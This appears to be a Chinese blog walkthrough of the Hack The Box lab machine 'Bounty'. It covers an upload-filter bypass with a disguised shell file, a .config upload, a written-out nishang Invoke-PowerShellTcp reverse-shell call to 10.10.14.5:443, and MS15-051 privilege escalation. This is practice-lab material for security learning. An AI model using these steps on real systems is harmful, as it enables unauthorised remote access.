您的位置: 首页  >  文章  >  Hack the box靶机 Bounty

Hack the box靶机 Bounty

分类: 文章 2024-10-21 14:09:16

Hack the box靶机 BountyHack the box靶机 BountyHack the box靶机 Bounty

两个页面都是没有权限不能访问
但是也没有扫出来登录页面

Hack the box靶机 Bounty

投个图
他们换了本字典
我懒得扫了

Hack the box靶机 BountyHack the box靶机 Bounty

有过滤
上传了一个shell.php.gif绕过了
找到一篇博客
上传.config

Hack the box靶机 BountyHack the box靶机 BountyHack the box靶机 BountyHack the box靶机 Bounty
Hack the box靶机 Bounty

使用nishang的Invoke-PowerShellTcp.ps1的时候
需要在这个文件末尾加入调用
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
然后就可以连接了

Hack the box靶机 Bounty

没有补丁
那ms15-051

Hack the box靶机 Bounty
Hack the box靶机 Bounty

完成

相关推荐